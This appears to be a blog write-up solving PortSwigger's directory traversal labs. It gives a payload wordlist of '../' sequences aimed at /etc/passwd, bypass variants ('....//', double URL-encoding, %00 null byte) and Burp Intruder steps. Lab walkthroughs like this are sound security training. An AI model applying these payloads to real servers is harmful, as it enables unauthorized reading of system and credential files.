3 min to read
Directory Traversal Vulnerabilities
PortSwigger Writeup.
What is directory traversal?
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.
The enumeration process is very important to know the os to use a custom payload for it.
- Payload Wordlist
- ../etc/passwd
- ../../etc/passwd
- ../../../etc/passwd
- ../../../../etc/passwd
- ../../../../../etc/passwd
- ../../../../../../etc/passwd
- ../../../../../../../etc/passwd
- ../../../../../../../../etc/passwd
- ../../../../../../../../../etc/passwd
- ../../../../../../../../../../etc/passwd
- ../../../../../../../../../../../etc/passwd
- ../../../../../../../../../../../../etc/passwd
- ../../../../../../../../../../../../../etc/passwd
- ../../../../../../../../../../../../../../etc/passwd
- ../../../../../../../../../../../../../../../../etc/passwd
In all portswigger labs, to solve the lab, retrieve the contents of the
file so let’s make our payloads list. If there any validation we will try to bypass it.
At first open burpsuite
Lab: File path traversal, simple case
Access the lab. To solve the lab we should retrieve the content of /etc/passwd file. Open any image in new tab and see the url
We will try to inject th payload after filename= so inercept the requst then send to intruder match the image name and take our wordlsit then past in payload options [simple lsit]. start attack
labe solved
- Note: in Linux serve if If the number “ ../” is large, it won’t change the output [result].
Lab: File path traversal, traversal sequences blocked with absolute path bypass
Access the lab. As we did in Lab: File path traversal, simple case but sent the request to repeater delete file name and try to inject simple payload
labe solved
Lab: File path traversal, traversal sequences stripped non-recursively
- Note: The application strips path traversal sequences from the user-supplied filename before using it
So we will try to bypass this validation. we will try to bypass it by replace
….// ….\/
So our payload format will be as
….//etc/passwd ….\/etc/passwd
So replace ../../ at the prefix of our payload and make the wordlist. Past in payload options [simple lsit] then start attack
Lab Solved
Lab: File path traversal, traversal sequences stripped with superfluous URL-decode
Access the lab. As we did in Lab: File path traversal, simple case but sent the intruder past in payload options [simple lsit]
Go to payload processing and add 2 URL-encode all characters
start attack
Lab Solved
Lab: File path traversal, validation of start of path
let’s open any image in the new tab. See the URL
This the path to save images
to to read passwd file we shoud go back 3 stip by ../
so the URL
Lab Solved
Lab: File path traversal, validation of file extension with null byte bypass
As in the name of the lab [validation of file extension with null byte bypass]
our payloads should contain null bytes to bypass the validation
Decimal | 0 |
Character | NUL(null character) |
URL Encoding (UTF-8) | %00 |
The application validates that the supplied filename ends with the expected file extension.
so the payloads should contain the name of the file [in our case image name ]at the end
so payload format should be as
Go to Payload Processing add suffix %00.
start attack
Lab Solved